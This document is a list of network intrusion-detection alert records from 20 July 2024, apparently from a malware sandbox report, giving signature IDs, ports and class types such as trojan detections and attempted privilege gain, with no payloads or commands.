                      Timestamp:07/20/24-23:01:08.606848
                      SID:2027339
                      Source Port:53660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2831300
                      Source Port:33446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.991545
                      SID:2025132
                      Source Port:47412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.718842
                      SID:2831300
                      Source Port:35816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.794519
                      SID:2027339
                      Source Port:50970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.909668
                      SID:2831300
                      Source Port:37660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221367
                      SID:2835222
                      Source Port:52450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.745622
                      SID:2027339
                      Source Port:38058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.547419
                      SID:2025132
                      Source Port:55264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.856714
                      SID:2025132
                      Source Port:34874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.979752
                      SID:2829579
                      Source Port:45060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.023857
                      SID:2027339
                      Source Port:42610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.307063
                      SID:2025132
                      Source Port:49106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.160872
                      SID:2027339
                      Source Port:47360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.755147
                      SID:2027339
                      Source Port:51278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.969609
                      SID:2025132
                      Source Port:41896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2835222
                      Source Port:45680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.092270
                      SID:2027339
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.701293
                      SID:2027339
                      Source Port:58940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:46618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.693187
                      SID:2831300
                      Source Port:41122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.953624
                      SID:2027339
                      Source Port:52432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2835222
                      Source Port:41478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.293628
                      SID:2027339
                      Source Port:35646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.980256
                      SID:2027339
                      Source Port:45806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:54070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.305474
                      SID:2027339
                      Source Port:58086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:38558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:49142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.223705
                      SID:2831300
                      Source Port:50334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2831300
                      Source Port:53204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:13.820007
                      SID:2025132
                      Source Port:37114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2829579
                      Source Port:36856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.095462
                      SID:2829579
                      Source Port:41082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.115620
                      SID:2025132
                      Source Port:51190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.385543
                      SID:2025132
                      Source Port:33372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.835178
                      SID:2831300
                      Source Port:38042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2835222
                      Source Port:40060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.266392
                      SID:2025132
                      Source Port:51400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.951298
                      SID:2829579
                      Source Port:55046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.963815
                      SID:2025132
                      Source Port:42942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.702732
                      SID:2831300
                      Source Port:44592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.921789
                      SID:2831300
                      Source Port:52396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.236261
                      SID:2027339
                      Source Port:57080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2829579
                      Source Port:47600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.671215
                      SID:2831300
                      Source Port:42194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.685722
                      SID:2831300
                      Source Port:50136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2835222
                      Source Port:38704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.296756
                      SID:2829579
                      Source Port:43348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.721561
                      SID:2831300
                      Source Port:39272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2829579
                      Source Port:34964
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2027339
                      Source Port:54360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2831300
                      Source Port:52826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.048479
                      SID:2027339
                      Source Port:36116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2831300
                      Source Port:34982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.957856
                      SID:2025132
                      Source Port:39886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.476492
                      SID:2027339
                      Source Port:37172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.685722
                      SID:2027339
                      Source Port:38056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.437937
                      SID:2025132
                      Source Port:39280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.083569
                      SID:2027339
                      Source Port:54864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.470424
                      SID:2831300
                      Source Port:38526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.485100
                      SID:2831300
                      Source Port:39258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.375803
                      SID:2025132
                      Source Port:52282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.667752
                      SID:2027339
                      Source Port:33118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.422050
                      SID:2027339
                      Source Port:57534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.703494
                      SID:2027339
                      Source Port:38988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.164492
                      SID:2025132
                      Source Port:45442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.796749
                      SID:2027339
                      Source Port:33462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2835222
                      Source Port:56890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.513085
                      SID:2027339
                      Source Port:53334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2829579
                      Source Port:37860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806645
                      SID:2831300
                      Source Port:41902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.465464
                      SID:2027339
                      Source Port:41994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2829579
                      Source Port:57988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.172994
                      SID:2027339
                      Source Port:49444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.747300
                      SID:2027339
                      Source Port:58464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221888
                      SID:2835222
                      Source Port:47604
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.405280
                      SID:2027339
                      Source Port:51008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.493447
                      SID:2027339
                      Source Port:36278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.833558
                      SID:2831300
                      Source Port:35974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.883801
                      SID:2027339
                      Source Port:47262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.669469
                      SID:2027339
                      Source Port:46694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2835222
                      Source Port:59528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2835222
                      Source Port:38714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.641942
                      SID:2831300
                      Source Port:46344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.749294
                      SID:2027339
                      Source Port:55868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.765841
                      SID:2027339
                      Source Port:34016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.415663
                      SID:2027339
                      Source Port:42988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2829579
                      Source Port:57980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.187842
                      SID:2835222
                      Source Port:33894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.085116
                      SID:2027339
                      Source Port:48072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.358680
                      SID:2831300
                      Source Port:40212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.299284
                      SID:2027339
                      Source Port:55122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.287237
                      SID:2027339
                      Source Port:33288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.648889
                      SID:2025132
                      Source Port:56418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.355589
                      SID:2835222
                      Source Port:39320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.945747
                      SID:2025132
                      Source Port:48476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2835222
                      Source Port:56956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:34552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.020177
                      SID:2831300
                      Source Port:56560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.555687
                      SID:2831300
                      Source Port:42530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.007374
                      SID:2027339
                      Source Port:39942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.773524
                      SID:2027339
                      Source Port:39008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2831300
                      Source Port:44806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.038410
                      SID:2027339
                      Source Port:45320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148145
                      SID:2835222
                      Source Port:55784
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.343511
                      SID:2025132
                      Source Port:49584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.508271
                      SID:2027339
                      Source Port:49518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.590674
                      SID:2831300
                      Source Port:46584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.124037
                      SID:2025132
                      Source Port:39086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2831300
                      Source Port:42266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.651332
                      SID:2835222
                      Source Port:55470
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.044693
                      SID:2027339
                      Source Port:41638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:37952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2835222
                      Source Port:39132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.600298
                      SID:2025132
                      Source Port:39780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2829579
                      Source Port:36256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2027339
                      Source Port:54670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.590937
                      SID:2027339
                      Source Port:58384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.987411
                      SID:2027339
                      Source Port:43042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.969418
                      SID:2025132
                      Source Port:46648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.212590
                      SID:2027339
                      Source Port:36886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.010540
                      SID:2027339
                      Source Port:53462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.324295
                      SID:2025132
                      Source Port:53764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.742666
                      SID:2027339
                      Source Port:60858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807102
                      SID:2831300
                      Source Port:54648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.292331
                      SID:2027339
                      Source Port:51002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2027339
                      Source Port:54258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.613165
                      SID:2027339
                      Source Port:52830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.246583
                      SID:2025132
                      Source Port:44988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.957644
                      SID:2831300
                      Source Port:51404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.855159
                      SID:2025132
                      Source Port:50424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.380561
                      SID:2025132
                      Source Port:44798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.313122
                      SID:2831300
                      Source Port:48484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.909111
                      SID:2835222
                      Source Port:54320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.004906
                      SID:2835222
                      Source Port:46974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.790169
                      SID:2831300
                      Source Port:32904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2829579
                      Source Port:46342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2831300
                      Source Port:33738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.839255
                      SID:2831300
                      Source Port:37964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.270795
                      SID:2027339
                      Source Port:58370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.628544
                      SID:2025132
                      Source Port:50292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:05.476791
                      SID:2025132
                      Source Port:56214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.360320
                      SID:2025132
                      Source Port:47796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.285526
                      SID:2027339
                      Source Port:55702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327540
                      SID:2027339
                      Source Port:57014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.525064
                      SID:2027339
                      Source Port:38604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.450410
                      SID:2027339
                      Source Port:48078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653028
                      SID:2829579
                      Source Port:33226
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.316196
                      SID:2027339
                      Source Port:59490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.005974
                      SID:2831300
                      Source Port:56290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.600114
                      SID:2027339
                      Source Port:38226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2829579
                      Source Port:47638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.855306
                      SID:2027339
                      Source Port:59376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.527007
                      SID:2027339
                      Source Port:47348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.977483
                      SID:2025132
                      Source Port:38882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.826575
                      SID:2831300
                      Source Port:42546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2829579
                      Source Port:57578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.560945
                      SID:2025132
                      Source Port:49348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.349275
                      SID:2829579
                      Source Port:40914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.951743
                      SID:2025132
                      Source Port:39594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221735
                      SID:2835222
                      Source Port:47684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2829579
                      Source Port:44984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.639622
                      SID:2831300
                      Source Port:57320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.614619
                      SID:2027339
                      Source Port:37214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2829579
                      Source Port:60438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.966087
                      SID:2025132
                      Source Port:42896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.668073
                      SID:2829579
                      Source Port:56550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.592319
                      SID:2025132
                      Source Port:52792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.883801
                      SID:2025132
                      Source Port:55112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.560388
                      SID:2831300
                      Source Port:50314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:03.987678
                      SID:2025132
                      Source Port:40410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:40920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974514
                      SID:2829579
                      Source Port:39410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.372363
                      SID:2025132
                      Source Port:38322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.090582
                      SID:2025132
                      Source Port:45838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2835222
                      Source Port:38312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.326982
                      SID:2027339
                      Source Port:60500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2835222
                      Source Port:49558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.472422
                      SID:2027339
                      Source Port:51862
                      Destination Port:52869
                      Protocol:TCP
